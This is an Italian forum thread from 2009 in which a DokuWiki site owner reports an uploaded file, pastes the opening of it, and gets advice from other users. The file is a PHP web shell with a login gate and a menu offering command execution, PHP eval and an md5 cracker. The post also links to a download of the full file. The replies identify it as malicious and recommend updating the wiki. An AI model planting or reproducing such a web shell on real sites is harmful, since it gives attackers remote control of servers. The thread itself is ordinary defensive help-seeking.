LinkBack URL
About LinkBacksHo un sito creato in PHP (dokuwiki), senza MySQL visto che usa dei file di testo per archiviare i dati.
Questa sera un utente di Libero (ho il suo IP) ha uploadato un file "flag.doc".
Non sono esperto ma a me sembra che sia uno script per trovare le password.
L'ho quindi tolto dal sito, volevo postarlo su questo forum ma è troppo lungo, comunque posso postare la prima parte:
La versione completa l'ho salvata qua:Codice PHP:
<?php
error_reporting(0); //If there is an error, we'll show it, k?
$me = basename(__FILE__);
$cookiename = "wieeeee";
if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
{
$_POST['pass'] = md5($_POST['pass']);
}
if($_POST['pass'] == $password)
{
setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
}
reload();
}
if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
login();
die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
chdir($_GET['dir']);
}
$pages = array(
'cmd' => 'Execute Command',
'eval' => 'Evaluate PHP',
'mysql' => 'MySQL Query',
'chmod' => 'Chmod File',
'phpinfo' => 'PHPinfo',
'md5' => 'md5 cracker',
'headers' => 'Show headers',
'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Killer Hack</title>
<head>
<style>
td {
font-size: 12px;
font-family: verdana;
color: #33FF00;
background: #000000;
}
#d {
background: #003000;
}
#f {
background: #003300;
}
#s {
background: #006300;
}
#d:hover
{
background: #003300;
}
#f:hover
{
background: #003000;
}
pre {
font-size: 10px;
font-family: verdana;
color: #33FF00;
}
a:hover {
text-decoration: none;
}
input,textarea,select {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #33FF00;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #33FF00;
color: #33FF00;
border-top-color: #33FF00;
font-family: verdana;
border-right-width: 1px;
border-right-color: #33FF00;
}
hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
$header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>© <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
http://www.megaupload.com/?d=FG7PWI07
Mi confermate che è un tentativo di hackerare il sito?
Cosa mi consigliate di fare?
Per adesso mi sono limitato a togliere i permessi di R/W e upload agli utenti anonimi (è un sito wiki e speravo nel contributo degli utenti per migliorarlo, evidentementi mi sbagliavo)
Visualizzazione risultati 1 fino 6 di 6
Discussione: Mi stanno hackerando il sito
-
27-05-2009, 23.20.38 #1
Neofita
- Data registrazione
- 21-08-2003
- Messaggi
- 10
Mi stanno hackerando il sito
-
27-05-2009, 23.56.24 #2
Altervistiano Junior
- Data registrazione
- 09-02-2007
- Messaggi
- 516
è una shell in php, l'intento è sicuramente malevolo
però se il file è .doc, e non è incluso in nessun file .php, dovrebbe essere innocuo
-
28-05-2009, 00.25.23 #3
Super Moderatore
- Data registrazione
- 18-04-2007
- Residenza
- Reggiolo (RE)
- Messaggi
- 6,552
Beh l'ultimo bug di smf riguardava la registrazione di uno spambot + upload di un avatar*.jpg contenente codice php che veniva eseguito (non so bene come) e infettava i files del forum.
Magari c'è un bug simile in dokuwiki e qualcuno stava tentando di sfruttarlo...
-
Edit: nel tuo sito vedo:
invece l'ultima release disponibile è la: dokuwiki-2009-02-14b cioè ben due anni di arretrati<meta name="generator" content="DokuWiki Release 2007-06-26" />
Vedi quanti bug risolti nelle nuove release: http://www.dokuwiki.org/changesUltima modifica di darkwolf : 28-05-2009 alle ore 00.34.46
» Salvatore Noschese - L'AltroWeb | Seguimi su: facebook | twitter | Google+
# Che aspetti? Unisciti alla community! Tanti nuovi gruppi ti aspettano
-
28-05-2009, 00.57.12 #4
Utente storico
- Data registrazione
- 02-07-2004
- Messaggi
- 2,017
Io ricevo circa un 3 4 tentativi di attacco di questo genere AL GIORNO.
quais sempre sono semplici bot che tentano di passare un file remoto via variabile nella speranza che lo includa.
Come detto sopra aggiorna gli script e per il resto non pensarci."L'intelligenza è una pianta che va curata continuamente.
Dovreste vedere com'è bello, il mio bonsai."
Rat-man®
[Gradient Text]
[Su che server sei?]
->flickr
-
28-05-2009, 13.43.45 #5Guest
Si confermo. Capita anche a me la stessa cosa :D
-
28-05-2009, 14.50.58 #6
Neofita
- Data registrazione
- 21-08-2003
- Messaggi
- 10
Grazie per le info, questa sera aggiornerò il sito, spero che vada tutto liscio, l’ultima volta ho avuto dei problemi durante l’aggiornamento di dokuwiki.
